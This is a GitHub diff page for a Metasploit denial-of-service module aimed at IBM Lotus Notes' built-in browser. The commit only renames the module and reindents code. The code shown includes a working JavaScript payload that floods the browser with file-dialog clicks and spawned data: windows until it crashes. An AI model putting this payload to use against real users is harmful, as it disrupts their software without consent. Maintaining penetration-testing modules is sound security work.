File tree Expand file tree Collapse file tree 1 file changed +12
-12
lines changed
modules/auxiliary/dos/http Expand file tree Collapse file tree 1 file changed +12
-12
lines changed Original file line number Diff line number Diff line change @@ -10,7 +10,7 @@ def initialize(info = {})
10
10
super (
11
11
update_info (
12
12
info ,
13
- 'Name' => "IBM Notes encodeURI DOS " ,
13
+ 'Name' => "IBM Notes Denial Of Service " ,
14
14
'Description' => %q(
15
15
This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
16
16
If successful, the browser will crash after viewing the webpage.
@@ -46,17 +46,17 @@ def setup
46
46
f.click();
47
47
setInterval("f.click()", 1);
48
48
setInterval(function(){
49
- for (var k in kins) {
50
- if (kins[k] && kins[k].status === undefined) {
51
- kins[k].close();
52
- delete kins[k];
53
- }
54
- }
55
- w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/ script>');
56
- if (w) {
57
- kins[i] = w;
58
- i++;
59
- }
49
+ for (var k in kins) {
50
+ if (kins[k] && kins[k].status === undefined) {
51
+ kins[k].close();
52
+ delete kins[k];
53
+ }
54
+ }
55
+ w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/ script>');
56
+ if (w) {
57
+ kins[i] = w;
58
+ i++;
59
+ }
60
60
}, 1);
61
61
</script>
62
62
</body></html>
You can’t perform that action at this time.
0 commit comments